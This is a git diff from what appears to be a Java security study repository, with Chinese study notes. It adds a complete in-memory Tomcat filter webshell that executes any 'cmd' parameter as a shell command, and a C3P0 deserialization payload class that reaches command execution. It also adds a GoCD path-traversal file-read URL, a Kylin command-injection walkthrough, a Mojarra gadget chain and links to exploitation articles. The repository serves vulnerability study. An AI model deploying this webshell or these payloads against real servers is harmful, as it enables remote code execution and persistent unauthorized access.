threadLocalRequest = (ThreadLocal) lastServicedRequest.get(null); + javax.servlet.ServletRequest request = threadLocalRequest.get(); + + try { + javax.servlet.ServletContext servletContext=request.getServletContext(); + + //判断是否已有该名字的filter,有则不再添加 + if (servletContext.getFilterRegistration("webShell") == null) { + + class WebShell implements javax.servlet.Filter{ + + public void doFilter(javax.servlet.ServletRequest request, javax.servlet.ServletResponse response, javax.servlet.FilterChain chain) throws java.io.IOException, javax.servlet.ServletException { + System.out.println("filter"); + String cmd=request.getParameter("cmd"); + + if(cmd!=null) { + String[] cmds = null; + + if (System.getProperty("os.name").toLowerCase().contains("win")) { + cmds = new String[]{"cmd.exe", "/c", cmd}; + } else { + cmds = new String[]{"sh", "-c", cmd}; + } + + java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); + java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a"); + String output = s.hasNext() ? s.next() : ""; + java.io.Writer writer = response.getWriter(); + writer.write(output); + writer.flush(); + writer.close(); + } + + chain.doFilter(request, response); + } + } + + //因为门面模式的使用,此处servletContext实际是ApplicationContextFacade,需要提取ApplicationContext + java.lang.reflect.Field contextField=servletContext.getClass().getDeclaredField("context"); + contextField.setAccessible(true); + org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(servletContext); + + //获取ApplicationContext中的StandardContext + contextField=applicationContext.getClass().getDeclaredField("context"); + contextField.setAccessible(true); + org.apache.catalina.core.StandardContext standardContext= (org.apache.catalina.core.StandardContext) contextField.get(applicationContext); + + //修改state + java.lang.reflect.Field stateField=org.apache.catalina.util.LifecycleBase.class.getDeclaredField("state"); + stateField.setAccessible(true); + stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTING_PREP); + + //注册filter + javax.servlet.FilterRegistration.Dynamic filterRegistration = servletContext.addFilter("webShell", new WebShell()); + filterRegistration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false,new String[]{"/*"}); + + //添加到filterConfigs + java.lang.reflect.Method filterStartMethod = org.apache.catalina.core.StandardContext.class.getMethod("filterStart"); + filterStartMethod.setAccessible(true); + filterStartMethod.invoke(standardContext, null); + + //调整filter位置 + org.apache.tomcat.util.descriptor.web.FilterMap[] filterMaps = standardContext.findFilterMaps(); + for (int i = 0; i < filterMaps.length; i++) { + if (filterMaps[i].getFilterName().equalsIgnoreCase("webShell")) { + org.apache.tomcat.util.descriptor.web.FilterMap filterMap = filterMaps[i]; + filterMaps[i] = filterMaps[0]; + filterMaps[0] = filterMap; + break; + } + } + + //恢复成LifecycleState.STARTE,否则会造成服务不可用 + stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTED); + + } + + }catch (Exception e){ + e.printStackTrace(); + } + + } + + }catch (Exception e){ + e.printStackTrace(); + } + } + + @Override + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { + + } + + @Override + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { + + } +} diff --git "a/java\345\233\236\346\230\276/src/main/resources/application.properties" "b/java\345\233\236\346\230\276/src/main/resources/application.properties" new file mode 100644 index 0000000..8b13789 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/main/resources/application.properties" @@ -0,0 +1 @@ + diff --git "a/java\345\233\236\346\230\276/src/test/java/com/firebasky/echo/EchoApplicationTests.java" "b/java\345\233\236\346\230\276/src/test/java/com/firebasky/echo/EchoApplicationTests.java" new file mode 100644 index 0000000..75e4d32 --- /dev/null +++ "b/java\345\233\236\346\230\276/src/test/java/com/firebasky/echo/EchoApplicationTests.java" @@ -0,0 +1,13 @@ +package com.firebasky.echo; + +import org.junit.jupiter.api.Test; +import org.springframework.boot.test.context.SpringBootTest; + +@SpringBootTest +class EchoApplicationTests { + + @Test + void contextLoads() { + } + +} diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 4cca6c6..34fce36 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -3,10 +3,29 @@ >[java危险函数](./java危险函数.md) >[代码审计基础](./代码审计基础.pdf) -+ 2021/6/1 [JAVA代码审计的一些Tips(附脚本)](https://xz.aliyun.com/t/1633) -+ 2021/6/1 [java代码审计之租车系统](./java代码审计之租车系统.pdf) [框架下载连接](http://down.chinaz.com/soft/38425.htm) -+ 2021/6/1 [JAVA代码审计之铁人下载系统 v1.0](http://foreversong.cn/archives/1005) -+ 2021/6/2 [JAVA代码审计 | 因酷网校在线教育系统](https://xz.aliyun.com/t/2646) -+ 2021/6/3 [Java 代码审计入门-02 SQL 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/6872) [流程图CVE-2019-9615](./img/CVE-2019-9615.png) -+ 2021/6/3 [Java 代码审计入门-03 XSS 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/6937) [漏洞代码CVE_2018_19178](./code/CVE_2018_19178.java) -+ 2021/6/4 [Java 代码审计入门-04 SSRF 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/7186) ++ 2021/6/1 [JAVA代码审计的一些Tips(附脚本)](https://xz.aliyun.com/t/1633) ++ 2021/6/1 [java代码审计之租车系统](./java代码审计之租车系统.pdf) [框架下载连接](http://down.chinaz.com/soft/38425.htm) ++ 2021/6/1 [JAVA代码审计之铁人下载系统 v1.0](http://foreversong.cn/archives/1005) ++ 2021/6/2 [JAVA代码审计 | 因酷网校在线教育系统](https://xz.aliyun.com/t/2646) ++ 2021/6/3 [Java 代码审计入门-02 SQL 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/6872) [流程图CVE-2019-9615](./img/CVE-2019-9615.png) ++ 2021/6/3 [Java 代码审计入门-03 XSS 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/6937) [漏洞代码CVE_2018_19178](./code/CVE_2018_19178.java) ++ 2021/6/4 [Java 代码审计入门-04 SSRF 漏洞原理与实际案例介绍](https://xz.aliyun.com/t/7186) ++ 2021/10/6 学习了java代码审计书中的jspxcms,发现其中的**conn.getContentType('image')可以通过自己搭建的http服务器实现**。 evilserver.php ++ 2021/11/01 突然间看了一篇文章[代码审计入门之Jeeplus代码审计](https://www.freebuf.com/articles/web/220066.html) ++ 2021/11/02 [CVE-2020-10189 Zoho ManageEngine反序列化RCE](https://xz.aliyun.com/t/7439) **对文件进行反序列化,绕过上传。** [参考](https://www.anquanke.com/post/id/200474) ++ 2022/02/03 [java代码审计系列第一弹——巡云轻论坛](https://www.freebuf.com/vuls/317847.html) + + +## 好文章 + +https://www.sec-in.com/author/8 这个师傅太猛了 + ++ 2021/12/21 [SpringMVC寻找Controller技巧](https://www.sec-in.com/article/552) **@(.*?)Mapping\(** ++ 2021/12/21 [绕过后缀安全检查进行文件上传](https://sec-in.com/article/647) **解决了条件竞争不知道文件名的问题,通过异常报错让程序停止向下执行绕过。(在multipart做文章)** ++ 2021/12/21 [绕过后缀安全检查进行文件上传-2](https://www.sec-in.com/article/1328) **只能说非常np了,servlet单例,属性在调用时会被共享,存在线程安全问题。扩展一下java中volatile有可能存在线程安全问题[参考](https://github.com/Firebasky/Java/blob/main/java%E6%97%A5%E5%B8%B8/Thinking_in_java%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile.md)** 看看能不能搭建一个环境复现一下。。。。 ++ 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) ++ 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) ++ 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** ++ 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** ++ 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据** ++ 2022/11/06 [【干货分享】五分钟教你挖掘小程序漏洞](https://mp.weixin.qq.com/s/95YiN8XJLGPUS5ykBUsmAg【干货分享】五分钟教你挖掘小程序漏洞) **小程序挖掘** diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/java\345\215\261\351\231\251\345\207\275\346\225\260.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/java\345\215\261\351\231\251\345\207\275\346\225\260.md" index f2c2aed..c2ebd96 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/java\345\215\261\351\231\251\345\207\275\346\225\260.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/java\345\215\261\351\231\251\345\207\275\346\225\260.md" @@ -28,6 +28,10 @@ SQL 注入: Select、Dao 、from 、delete 、update、insert 命令注入: getRuntime、exec、cmd、shell GroovyShell.evaluate ``` +```java +ssrf: HttpClient.execute()、HttpClient.executeMethod()、HttpURLConnection.connect、HttpURLConnection.getInputStream、URL.openStream、HttpServletRequest、BasicHttpEntityEnclosingRequest、DefaultBHttpClientConnection、BasicHttpRequest、 +``` + ```java 缓冲区溢出: strcpy,strcat,scanf,memcpy,memmoGetc(),fgetc(),getchar;read,printf ``` diff --git "a/java\345\272\217\345\210\227\345\214\226\351\223\276/C3P0/Readme.md" "b/java\345\272\217\345\210\227\345\214\226\351\223\276/C3P0/Readme.md" index 3af5a91..784f71e 100644 --- "a/java\345\272\217\345\210\227\345\214\226\351\223\276/C3P0/Readme.md" +++ "b/java\345\272\217\345\210\227\345\214\226\351\223\276/C3P0/Readme.md" @@ -50,6 +50,90 @@ public static String bytesToHexString(byte[] bArray, int length) { } ``` +## 不出网利用 + + +[JAVA反序列化之C3P0不出网利用](https://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247483871&idx=1&sn=56c63dc3f4dc22ad9c61143ee2c484df&chksm=c2b103a9f5c68abfb8e6cb39e81210cce98a3a6850c69b756b7018bc0db829d00af08839d8fc&mpshare=1&scene=23&srcid=1009lg8jEvc5MFXslLojyUud&sharer_sharetime=1644428964407&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + +```java +package ysoserial.payloads; + + +import java.io.PrintWriter; +import java.sql.SQLException; +import java.sql.SQLFeatureNotSupportedException; +import java.util.logging.Logger; + +import javax.naming.NamingException; +import javax.naming.Reference; +import javax.naming.Referenceable; +import javax.naming.StringRefAddr; +import javax.sql.ConnectionPoolDataSource; +import javax.sql.PooledConnection; + +import com.mchange.v2.c3p0.PoolBackedDataSource; +import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase; + +import org.apache.naming.ResourceRef; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.annotation.PayloadTest; +import ysoserial.payloads.util.PayloadRunner; +import ysoserial.payloads.util.Reflections; + + +/** +yulegeyu modified + */ +@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" ) +@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} ) +@Authors({ Authors.MBECHLER }) +public class C3P0Tomcat implements ObjectPayload { + public Object getObject ( String command ) throws Exception { + + PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class); + Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource("org.apache.naming.factory.BeanFactory", null)); + return b; + } + + private static final class PoolSource implements ConnectionPoolDataSource, Referenceable { + + private String className; + private String url; + + public PoolSource ( String className, String url ) { + this.className = className; + this.url = url; + } + + public Reference getReference () throws NamingException { + ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null); + ref.add(new StringRefAddr("forceString", "x=eval")); + String cmd = "open -a calculator.app"; + ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','"+ cmd +"']).start()\")")); + return ref; + } + + public PrintWriter getLogWriter () throws SQLException {return null;} + public void setLogWriter ( PrintWriter out ) throws SQLException {} + public void setLoginTimeout ( int seconds ) throws SQLException {} + public int getLoginTimeout () throws SQLException {return 0;} + public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;} + public PooledConnection getPooledConnection () throws SQLException {return null;} + public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;} + + } + + + public static void main ( final String[] args ) throws Exception { + PayloadRunner.run(C3P0.class, args); + } + +} +``` + +小trick:实例化BeanFactory对象调用getObjectInstance可以rce + > 参考 > > http://redteam.today/2020/04/18/c3p0%E7%9A%84%E4%B8%89%E4%B8%AAgadget/ diff --git "a/java\345\272\217\345\210\227\345\214\226\351\223\276/CommonsBeanutils/CommonsBeanutils1.java" "b/java\345\272\217\345\210\227\345\214\226\351\223\276/CommonsBeanutils/CommonsBeanutils1.java" index 11b9b3a..06a0638 100644 --- "a/java\345\272\217\345\210\227\345\214\226\351\223\276/CommonsBeanutils/CommonsBeanutils1.java" +++ "b/java\345\272\217\345\210\227\345\214\226\351\223\276/CommonsBeanutils/CommonsBeanutils1.java" @@ -10,6 +10,7 @@ public class CommonsBeanutils1 { public static void main(String[] args) throws Exception { TemplatesImpl tmpl = SerializeUtil.generateTemplatesImpl(); //Collections.reverseOrder() + //final BeanComparator comparator = new BeanComparator(null, Collections.reverseOrder()); final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); final PriorityQueue queue = new PriorityQueue(2, comparator); queue.add("1"); diff --git "a/java\345\272\217\345\210\227\345\214\226\351\223\276/Mojarra/Readme.md" "b/java\345\272\217\345\210\227\345\214\226\351\223\276/Mojarra/Readme.md" new file mode 100644 index 0000000..ddb39e2 --- /dev/null +++ "b/java\345\272\217\345\210\227\345\214\226\351\223\276/Mojarra/Readme.md" @@ -0,0 +1,21 @@ +# Mojarra + +https://www.synacktiv.com/publications/finding-gadgets-like-its-2015-part-2.html + +https://github.com/synacktiv/mojarragadget + +https://mvnrepository.com/artifact/org.glassfish/javax.faces + +tw上的新链 + +``` +TiedMapEntry.toString() + TiedMapEntry.getValue() + SingletonMap.get() + SingletonMap.isEqualKey() +ValueExpressionValueBindingAdapter.equals() + IndexedValueExpression.getType() + ValueExpressionImpl.getValue() +``` + +![gadgets](https://user-images.githubusercontent.com/63966847/139520715-04f1b40c-b2d4-4702-bc48-572da16254d3.jpg) diff --git "a/java\345\272\217\345\210\227\345\214\226\351\223\276/README.md" "b/java\345\272\217\345\210\227\345\214\226\351\223\276/README.md" index ad79e36..08054ba 100644 --- "a/java\345\272\217\345\210\227\345\214\226\351\223\276/README.md" +++ "b/java\345\272\217\345\210\227\345\214\226\351\223\276/README.md" @@ -14,3 +14,5 @@ + [并没有添加Wicket链]() **因为和FileUpload一样。。。。。** + [添加了CommonsBeanutils链](CommonsBeanutils) **来自p师傅的文章,不需要依赖cc组件**[CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html#shiro) + [添加了AspectJWeaver利用链](AspectJWeaver) **主要是写文件触发put方法,自己尝试不需要cc组件去挖掘没有成功。。。。** ++ [添加了Mojarra利用链](Mojarra) **没有详细的分析大概就是最后调用表达式** **[jsf](https://www.oracle.com/cn/java/technologies/jsf.html)** The gadget chain is valid for the implementation of the JSF specification in version 2.3 and 3.0. ++ diff --git "a/java\346\227\245\345\270\270/CVE-2021-43287.md" "b/java\346\227\245\345\270\270/CVE-2021-43287.md" new file mode 100644 index 0000000..937b7bd --- /dev/null +++ "b/java\346\227\245\345\270\270/CVE-2021-43287.md" @@ -0,0 +1,28 @@ +# CVE 2021 43287 + +> GoCD 一款先进的持续集成和发布管理系统,由ThoughtWorks开发。(不要和Google的编程语言Go混淆了!)其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。ThoughtWorks开源持续交付工具Go。使用Go来建立起一个项目的持续部署pipeline是非常快的,非常方便。 GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取。 + +## 影响版本 + +``` +v20.6.0 - v21.2.0 +``` + +## 漏洞点 + +![image-20220115201323862](https://user-images.githubusercontent.com/63966847/149621578-1249eeb8-f454-48ac-8edc-c5385a69661d.png) + + +## 演示 + +![image-20220115201231569](https://user-images.githubusercontent.com/63966847/149621580-174d710e-5900-4860-b877-6a67f115c13c.png) + + +## 修复 + +https://github.com/gocd/gocd/commit/41abc210ac4e8cfa184483c9ff1c0cc04fb3511c#diff-cc02ae4dc975bd7648bbbff5f5a2d98867674a767acc35c99d4cfd4d5a6fe488 + +![image-20220115201143857](https://user-images.githubusercontent.com/63966847/149621583-5334295f-a207-4da9-b5ad-1182bacf76d2.png) + + +删除了路由。 diff --git "a/java\346\227\245\345\270\270/CVE-2021-45456ApacheKylin\345\221\275\344\273\244\346\263\250\345\205\245\345\210\206\346\236\220\350\241\245\345\205\205.md" "b/java\346\227\245\345\270\270/CVE-2021-45456ApacheKylin\345\221\275\344\273\244\346\263\250\345\205\245\345\210\206\346\236\220\350\241\245\345\205\205.md" new file mode 100644 index 0000000..b8dead8 --- /dev/null +++ "b/java\346\227\245\345\270\270/CVE-2021-45456ApacheKylin\345\221\275\344\273\244\346\263\250\345\205\245\345\210\206\346\236\220\350\241\245\345\205\205.md" @@ -0,0 +1,85 @@ +# CVE-2021-45456 Apache Kylin 命令注入 + +>看着y4er师傅写的分析,第一次看有点懵逼,所以简单的补充一下。 + +## 补充分析 + +首先漏洞点在该路由的 **dumpProjectDiagnosisInfo**方法中project可控。 + +![image-20220114222208845](https://user-images.githubusercontent.com/63966847/149534592-9f600b83-9036-45f3-a9a9-c7bc2bae5e48.png) + + +跟着进去,可以看到**runDiagnosisCLI**方法之后正常执行命令并且project一直可控。所以非常有机会RCE了! + +![image-20220114222316611](https://user-images.githubusercontent.com/63966847/149534609-f5d94546-4965-4580-8d1f-bfcb054127c3.png) + + +唯一绕过就是不让 **projectInstance**为null,不然就throw抛异常。所以我们看看projectInstance得到如何获得。 + +首先通过 **convertStringToBeAlphanumericUnderscore**方法进行替换,输入 **touch 123**则替换之后就为 **touch123** + +![image-20220114222541519](https://user-images.githubusercontent.com/63966847/149534631-abb945b7-2bce-4fbe-baa3-e7032f013124.png) + + +之后通过 **getProject**方法去找有没有 **touch123**这个项目。看下面是通过**projectMap.get(projectName);**去获得如果有就不会抛异常就成功命令执行。 + +![image-20220114222809923](https://user-images.githubusercontent.com/63966847/149534653-e78ad090-416d-4ce6-ae15-1fed7012cbea.png) + + + +所以我们在看看得到才什么类中获取,也就是去看 **projectMap**是指的那个类。 + +![image-20220114222920990](https://user-images.githubusercontent.com/63966847/149534679-31cc4590-a299-4882-9bee-b8fd9789b776.png) + + + +然后跟上ProjectInstance,则到了如下代码,可以看到setname进去,所以我们最开始需要setname进去和 **touch123**相同就可以了 + + +![image-20220114223024834](https://user-images.githubusercontent.com/63966847/149534692-aacfd561-fcc5-42ae-94c0-84c342f026be.png) + + +向上跟踪 + +![image-20220114223153636](https://user-images.githubusercontent.com/63966847/149534717-bb589da3-01f3-4f5b-a81b-b62e23419bc9.png) + + +然后去跟踪 **createProject**方法,之后到了 **saveProject**方法 + +![image-20220114223350119](https://user-images.githubusercontent.com/63966847/149534727-a5264b5f-6dce-496d-bccd-90e6e0b4e392.png) + + +可以看到传递的是json格式然后去获得name,并且通过isAlphanumericUnderscore判断了,但是如果执行命令肯定set进去的name是 **tuoch123**,巧的是 **tuoch123**刚刚好去绕过。 + +![image-20220114223924151](https://user-images.githubusercontent.com/63966847/149534845-842825f1-95ee-4028-a70c-d7d63f9651d2.png) + + + +![image-20220114223911294](https://user-images.githubusercontent.com/63966847/149534827-4f56fa4c-6fb9-4a8f-bfd3-2b798e8ab042.png) + + +从而成功执行命令。 + +## 演示 + +y4er师傅的图 + +先创建项目名 + +![image-20220114224040087](https://user-images.githubusercontent.com/63966847/149534861-95093753-4e7f-4b8d-a552-7218ac5ce038.png) + + +执行命令 + +![image-20220114224119476](https://user-images.githubusercontent.com/63966847/149534871-c0d29304-c9ca-43b5-b2ac-6abae59abe52.png) + + +## 修复 + +![image-20220114224356250](https://user-images.githubusercontent.com/63966847/149534884-ff61e395-b5bc-4c97-94a3-3f07b3105f53.png) + + +传入cmd的参数改为projectName而非http传入的project,projectName经过convertStringToBeAlphanumericUnderscore() 处理,所以无法输入非字母数字下划线的字符来触发命令执行。 + +(除非单个命令可以创成严重危害。。。。。 + diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a5965f4..a8914bd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -1,6 +1,8 @@ # java日常 >有一些不知道这么分类就放里面吧 +> +## 2021 + 2021/7/27 [java-fix序列化漏洞](java-fix序列化漏洞.md) + 2021/7/28 [java执行js导致命令执行](java执行js导致命令执行.pdf) @@ -25,3 +27,297 @@ + 2021/9/15 [FastJson反序列化漏洞利用的三个细节 - TemplatesImpl的利用链](https://kingx.me/Details-in-FastJson-RCE.html) + 2021/9/18 [Java 反序列化漏洞始末(3)— fastjson](https://b1ue.cn/archives/184.html) + 2021/9/18 [log4j<=1.2.17反序列化漏洞(CVE-2019-17571)分析](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483962&idx=1&sn=0e059564c368b84e3483704821aac06b&chksm=cf36fa7af841736c622b957459091f3dd994adbfbc8bf8bcab032995c0885776c62530eaf465&mpshare=1&scene=23&srcid=0918r2rgVPTbTKFRbVikY7cS&sharer_sharetime=1631972571155&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **log4j组件存在反序列化漏洞端口4560** ++ 2021/9/24 [搞懂RMI、JRMP、JNDI-终结篇](https://threedr3am.github.io/2020/03/03/%E6%90%9E%E6%87%82RMI%E3%80%81JRMP%E3%80%81JNDI-%E7%BB%88%E7%BB%93%E7%AF%87/) **LDAP服务攻击一般是先测Reference再测deserializeObject** ++ 2021/9/25 [JAVA Apache-CommonsCollections 序列化漏洞分析以及漏洞高级利用](https://www.iswin.org/2015/11/13/Apache-CommonsCollections-Deserialized-Vulnerability/) [实现代码](https://github.com/Firebasky/Java/tree/main/java%E5%9B%9E%E6%98%BE) ++ 2021/9/26 [gradle和maven有什么用?分别有什么区别](https://www.zhihu.com/question/29338218) **简单的了解了一下gradle项目搭建** ++ 2021/9/27 [java 反序列化 ysoserial exploit/JRMPClient 原理剖析](https://dandelioncloud.cn/article/details/1432371613173100545/) **简单的说让靶机反序列化payloads/JRMPListener进行开启rmi端口,然后使用exploit/JRMPClient去连接并且发送payload反序列化攻击,是利用DGC通信的。JEP 290之后就不行了。** ++ 2021/9/27 [java 反序列化 ysoserial exploit/JRMPListener 原理剖析](https://dandelioncloud.cn/article/details/1432371613252792321) **简单的说自己的vps上开启jrmp服务监听,靶机反序列化payloads/JRMPClient 然后来连接我们的vps,我们在发送payload进行反序列化,原理也是利用DGC通信的。在使用this.classLoader.loadClass加载时,可以来绕过。** 见: ++ 2021/10/2 [缩小ysoserial payload体积的几个方法](https://xz.aliyun.com/t/6227) **原理上是通过createTemplatesImpl去实现的** 说不定有时候会遇到呢? ++ 2021/10/3 [Java 实现后台执行](https://jayl1n.github.io/2020/02/13/java-nohup-implementation/) ++ 2021/10/3 [Java项目中常见jar包的说明](https://www.mi1k7ea.com/2019/11/25/%EF%BC%88%E8%BD%AC%EF%BC%89Java%E9%A1%B9%E7%9B%AE%E4%B8%AD%E5%B8%B8%E8%A7%81jar%E5%8C%85%E7%9A%84%E8%AF%B4%E6%98%8E/) **熟悉一些jar包了解了解** ++ 2021/10/3 [XXL-JOB Hessian2反序列化漏洞](https://www.mi1k7ea.com/2021/04/22/XXL-JOB-Hessian2%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/) ++ 2021/10/3 [Java代码反反编译对抗思路](https://www.mi1k7ea.com/2020/05/01/Java%E4%BB%A3%E7%A0%81%E5%8F%8D%E5%8F%8D%E7%BC%96%E8%AF%91%E6%80%9D%E8%B7%AF/) **之前自己想通过加密class实现,不过不是特别通用就没有写了。。。。** ++ 2021/10/10 [XXE漏洞利用技巧:从XML到远程代码执行](https://blog.csdn.net/u012206617/article/details/109038388) **其中总结的xxe利用非常好,还有挖掘思路和netdoc协议和jar协议,还有自定义http访问延迟连接保证临时文件不被快速删除** ++ 2021/10/19 [JAVA代码审计业务安全Checklist](https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247500712&idx=1&sn=13027edf1e9d3385b650e611e9f559ab&chksm=ec1c9697db6b1f812fd88463a8d8301303b8c7cc364497d2ce1ca2190cf96701ad25463fc01d&mpshare=1&scene=23&srcid=1018GCa0aDvbQenw0fTuSv6F&sharer_sharetime=1634527194186&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **代码审计比较帮助** ++ 2021/10/19 [在Jfinal使用redis缓存时存在的反序列化问题](https://b1eed.github.io/2020/12/05/Jfinal_readObject/) **这个和CVE-2020-26945 mybatis二级缓存反序列化有异曲同工之妙** ++ 2021/10/21 [自定义ClassLoader绕过poc为什么很多人执行出现问题的缘由](https://github.com/codeplutos/java-security-manager-bypass/issues/2) **可能以后会遇到。** ++ 2021/10/25 [defineClass在java反序列化当中的利用](https://paper.seebug.org/572/) defineClass可以从byte[]还原出一个Class对象 **org.mozilla.classfile.DefiningClassLoader#defineClass** ++ 2021/10/26 [浅析JDWP远程命令执行漏洞](https://www.mi1k7ea.com/2021/08/06/%E6%B5%85%E6%9E%90JDWP%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/) 大概就是开启了远程Debugger.. ++ 2021/10/26 [浅析Ofbiz反序列化漏洞CVE-2020-9496](https://www.mi1k7ea.com/2021/09/21/%E6%B5%85%E6%9E%90Ofbiz%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2020-9496%EF%BC%89/) 版本小于17.12.04 ++ 2021/10/26 [Hessian 原理分析](https://www.cnblogs.com/shangxiaofei/p/4222170.html) 大概就是以二进制数组传输的rpc,存在反序列化问题。 ++ 2021/10/26 [XXL-JOB Hessian2反序列化漏洞](https://www.mi1k7ea.com/2021/04/22/XXL-JOB-Hessian2%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/) ++ 2021/10/30 [Mojarra JSF ViewState 反序列化漏洞](https://blog.csdn.net/xuandao_ahfengren/article/details/113135364) ++ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) **使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533** [代码修复](https://github.com/openjdk/jdk8u-dev/commit/644ddd7722bea502f029378c22d51b6eb66f8c25) ++ 2021/11/02 [Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)](https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.zh-cn.md) 暴露接口反序列化。。。 ++ 2021/11/03 [浅谈Liferay Portal JSON Web Service未授权反序列化远程代码执行漏洞](https://xz.aliyun.com/t/7485) ++ 2021/11/03 [H2 Database Console 未授权访问](https://github.com/vulhub/vulhub/blob/master/h2database/h2-console-unacc/README.zh-cn.md) ++ 2021/11/30 [wsdl相关](wsdl.md) **接触到一些soap协议。。。** ++ 2021/12/11 [log4j 漏洞一些特殊的利用方式](https://mp.weixin.qq.com/s?__biz=Mzg4OTExMjE2Mw==&mid=2247483945&idx=1&sn=b15b68d95da83bb20f1b3496396f823a&chksm=cff19125f88618338373a32f98be3d2a9497b464d6531658c2aa96f4872c23eed294441917b5&mpshare=1&scene=23&srcid=1211aS0Tghr1agBnBRlwwGTw&sharer_sharetime=1639232420884&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **自己也发现了这个利用思路,不过不知道ResourceBundle类是干什么的。。。。** https://www.cnblogs.com/jona-test/p/11399218.html **用来读取项目中后缀为properties的配置文件,然后通过dnslog或者ldap回显示** ++ 2021/12/13 [Java读文件](https://www.cnblogs.com/hkgov/p/14707726.html) **方便操作。。。** ++ 2021/12/14 [不使用new创建对象](https://zhuanlan.zhihu.com/p/214093086) **unsafe.allocateInstance()** [unsafe使用](https://tech.meituan.com/2019/02/14/talk-about-java-magic-class-unsafe.html) ++ 2021/12/14 [Spring Boot中关于%2e的Trick](http://rui0.cn/archives/1643) ++ 2021/12/18 